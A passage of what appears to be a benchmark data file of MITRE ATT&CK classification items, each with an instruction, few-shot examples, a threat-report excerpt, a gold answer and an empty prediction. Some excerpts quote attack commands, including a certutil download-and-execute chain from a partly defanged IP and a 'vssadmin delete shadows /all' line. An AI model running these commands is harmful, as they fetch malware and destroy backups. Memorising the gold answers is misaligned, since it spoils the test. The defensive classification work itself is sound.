leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\nhas used to use DLL side-loading to evade anti-virus and to maintain persistence on a victim.", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206\n\t - T1105: Ingress Tool Transfer\n- Text: After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\nThe DDE instructions attempt to run the following the following command on the victim host, which attempts to download and execute a payload from a remote server: C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\rundll32.exeC:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec_RunDLLC:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -fhxxp://220.158.216[.]127/MScertificate.exe & MScertificate.exe\" During our analysis, we observed this DDE downloading and executing a Zebrocy AutoIt downloader (f27836430\u2026), configured to attempt to download an additional payload from 220.158.216[.]127", "gold": "- T1036: Masquerading\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MCMD has been named Readme.txt to appear legitimate.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.\n\t - T1036: Masquerading\n- Text: KillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play Support name\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\nsaves one of its files as mpr.dll in the Windows folder, masquerading as a legitimate library file.", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Some variants use SSL to encrypt C2 communications.\n\t - T1573: Encrypted Channel\n", "input": "\nSome samples encrypt C2 communications with RC4.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The shellcode uses a 16-byte XOR key for decrypting the data as shown in Figure 10\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: MechaFlounder has the ability to use base16 encoded strings in C2.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nTo decode this information, BADNEWS takes the following steps: Base64-decode the string Perform the decoding cipher used in previous versions Base64-decode the result Decrypt the result using the Blowfish algorithm and a static key A script, which is included in the Appendix, will decrypt data from these dead drop resolvers", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Trojan.Karagany has used plugins with a self-delete capability.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: REvil has the capability to destroy files and folders.\n\t - T1485: Data Destruction\n- Text: GrimAgent can delete previously created tasks on a compromised host.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", "input": "\nhas the capability to delete files.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hi-Zor encrypts C2 traffic with TLS.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.\n\t - T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n- Text: LookBack uses a modified version of RC4 for data transfer.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nThe AES key is unique for each communication and is encrypted with one of two RSA public keys", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Earth Lusca used the command \"ipconfig\" to obtain information about network configurations.\n\t - T1016: System Network Configuration Discovery\n- Text: The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what\u00a0 commands the C2 wishes to run by issuing a request to the following URL:http:///what? After issuing the what command, the Trojan will parse the C2\u2019s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit\n\t - T1071: Application Layer Protocol\n\t - T1573: Encrypted Channel\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1571: Non-Standard Port\n\t - T1132: Data Encoding\n\t - T1008: Fallback Channels\n\t - T1043: Commonly Used Port\n", "input": "\nused an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim\u2019s machine.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active\n\t - T1568: Dynamic Resolution\n- Text: BACKSPACE uses HTTP as a transport to communicate with its command server.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: 0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7 \u00a0 Add/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3 \u00a0 Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4 \u00a0 Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1105: Ingress Tool Transfer\n\t - T1008: Fallback Channels\n", "input": "\nAnyconnect[.]stream Bigip[.]stream Fortiweb[.]download Kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win The listed C2 servers all resolved to IPs belonging to a service provider in China at 1.2.9.0/24, which is the IP address used by the C2 server to send a cancel communications message to the end system", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an\u00a0attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1105: Ingress Tool Transfer\n\t - T1102.002: Web Service - Bidirectional Communication\n\t - T1204.001: User Execution - Malicious Link\n- Text: Wizard Spider has used HTTP for network communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Stealth Falcon malware gathers the registered user and primary owner name via WMI.\n\t - T1033: System Owner/User Discovery\n", "input": "\nThe mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request: GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=_&continue=dnsadmin After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\hupdate.ex (note \u201cex,\u201d not \u201cexe\u201d) The capability to download additional components from the control server", "gold": "- T1033: System Owner/User Discovery\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 obtained a KeePass database from a compromised host.\n\t - T1555.005: Credentials from Password Stores - Password Managers\n- Text: Calisto collects Keychain storage data and copies those passwords/tokens to a file.\n\t - T1555.001: Credentials from Password Stores - Keychain\n- Text: APT29 has stolen user's saved passwords from Chrome.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\ngathers credentials in files for chrome, 1password, and keychains.", "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.\n\t - T1021.004: Remote Services - SSH\n", "input": "\ninjects itself into the secure shell (SSH) process.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: lists the running processes\n\t - T1057: Process Discovery\n- Text: Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http://108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread Most of the parameters are self-explanatory\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n- Text: This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode\n\t - T1124: System Time Discovery\n", "input": "\nSeveral malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by also gathers process times.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PS1 is distributed as a set of encrypted files and scripts.\n\t - T1027: Obfuscated Files or Information\n- Text: Finally, the payloads were almost never repeated. The threat actor made sure that each payload had a unique hash, and some payloads were packed using different types of packers, both known and custom\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", "input": "\nA closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. The dumped hashes were used to authenticate to other machines via pass the hash\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n- Text: Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount\n\t - T1078.002: Valid Accounts - Domain Accounts\n\t - T1550.001: Use Alternate Authentication Material - Application Access Token\n", "input": "\nTo move laterally on a victim network, has used credentials stolen from various systems on which it gathered usernames and password hashes.", "gold": "- T1078: Valid Accounts", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cyclops Blink has the ability to upload exfiltrated files to a C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Gelsemium can compress embedded executables with the zlib library.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy\n\t - T1560: Archive Collected Data\n", "input": "\nmalware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nestablishes persistence via a .lnk file in the victim\u2019s startup path.", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HELLOKITTY can delete volume shadow copies on compromised hosts.\n\t - T1490: Inhibit System Recovery\n- Text: Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.\n\t - T1489: Service Stop\n- Text: The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named \u201cMy_files.zip\u201d to \u201cMy_files.zip.IAsnM\u201d, \u201cMy_files2.zip\u201d to \u201cMy_files2.zip.WZlF\u201d and so on. Also, the threat actor creates the \u201cRECOVER-FILES.txt\u201d with ransom note in all folders that contain encrypted files, as shown in the figure below\n\t - T1486: Data Encrypted for Impact\n", "input": "\nAfter the encryption of file, it will delete shadow copies with the command \u201c vssadmin delete shadows /all \u201d to ensure that all the data cannot be restored easily.", "gold": "- T1485: Data Destruction", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share.\n\t - T1047: Windows Management Instrumentation\n- Text: Turla has used WMI event filters and consumers to establish persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1018: Remote System Discovery\n", "input": "\nPerhaps they plan to pair this stealer with another dropper that maintains the WMI anti-AV functionality", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY has the ability to set a Registry key to run a cmd.exe command.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: (On the left is NavRAT, and on the right is the shellcode of ROKRAT): We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1105: Ingress Tool Transfer\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nSeveral commands are supported by the 's implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used BITSAdmin to download additional tools.\n\t - T1197: BITS Jobs\n- Text: Tropic Trooper has used a delivered trojan to download additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: Leviathan has used PowerShell for execution.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\ncan download a hosted \"beacon\" payload using .", "gold": "- T1197: BITS Jobs", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey\n\t - T1012: Query Registry\n- Text: Conficker adds Registry Run keys to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1112: Modify Registry\n", "input": "\nsearches and reads the value of the Windows Update Registry Run key.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group malware KiloAlfa contains keylogging functionality.\n\t - T1056.001: Input Capture - Keylogging\n- Text: is capable of logging keystrokes.\n\t - T1056: Input Capture\n- Text: SOUNDBITE is capable of enumerating application windows.\n\t - T1010: Application Window Discovery\n", "input": "\nhas used tools to perform keylogging.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\t - T1210: Exploitation of Remote Services\n- Text: Dubbed \u2018SpeakUp\u2019, the new Trojan exploits known vulnerabilities in six different Linux 